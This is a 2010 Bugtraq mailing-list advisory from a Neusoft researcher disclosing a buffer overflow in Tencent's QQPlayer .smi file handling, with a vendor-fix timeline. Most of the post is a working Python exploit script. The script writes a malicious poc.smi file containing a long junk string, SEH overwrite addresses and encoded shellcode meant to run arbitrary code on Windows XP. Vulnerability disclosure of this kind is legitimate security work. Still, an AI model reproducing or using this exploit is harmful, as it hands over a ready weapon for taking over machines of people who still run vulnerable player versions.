[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
QQplayer smi File Processing Buffer Overflow Vulnerability
- To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: QQplayer smi File Processing Buffer Overflow Vulnerability
- From: lilf <lilf@xxxxxxxxxxx>
- Date: Mon, 26 Jul 2010 14:43:06 +0800
QQplayer smi File Processing Buffer Overflow Vulnerability
By Lufeng Li of Neusoft Corporation
Vulnerable: QQPlayer<=2.3.696.400p1
Vendor: Tencent Inc
1) Software Description:
QQPlayer is developed by Tencent Inc.It is very popular universal multimedia
player in China.
2) Details:
A buffer overflow vulnerability in QQplayer that Processing smi file. allows
remote attackers to execute arbitrary code via a long string in an smi file.
3) Timeline:
2010.05.26 Vendor notified
2010.06.8 Vendor released new fixed versions(QQplayer 2.4.716.400p1)
2010.07.26 Advisory released
4) Exploit:
#!/usr/bin/env python
#################################################################
#
# Title: QQPlayer smi File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400p1
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :
head ='''<smil>
<head>
<meta name="title" content="_"/>
<meta name="author" content="Warner Music Group'''
junk = "A" * 2001
nseh ="\x42\x61\x21\x61"
seh ="\x39\x0c\x41\x00"
adjust="\x30\x83\xc0\x0b"
shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
"QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
"KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
"QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
"TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
"HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
junk_="R"*8000
foot ='''"/>
</head>
<body>
<seq>
<video
src="rtsp://sos2208-1-rm.edgestreams.net/listeningparties/424444/.uid.MSAaAQCGwp9yU7mAOw6d182868f6d3c28b7f158b74fef576e1.424444_specialops.rm?
auth=caEdAc4dqaVcqbHcobOcGaVdaaOdXarcBat-bl.oeA-eS-HEGqpvyyvzDzssup&aifp=0001"
title="_" author="Warner Music Group" copyright="2007 Rhino Entertainment"
fill="freeze"/>
</seq>
</body>
</smil>
<!-- Generated by Akamai Stream OS BOSS (v10.0.14-20100129) / d366992c -->'''
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
fobj = open("poc.smi","w")
fobj.write(payload)
fobj.close()
---------------------------------------------------------------------------------------------------
Confidentiality Notice: The information contained in this e-mail and any
accompanying attachment(s)
is intended only for the use of the intended recipient and may be confidential
and/or privileged of
Neusoft Corporation, its subsidiaries and/or its affiliates. If any reader of
this communication is
not the intended recipient, unauthorized use, forwarding, printing, storing,
disclosure or copying
is strictly prohibited, and may be unlawful.If you have received this
communication in error,please
immediately notify the sender by return e-mail, and delete the original message
and all copies from
your system. Thank you.
---------------------------------------------------------------------------------------------------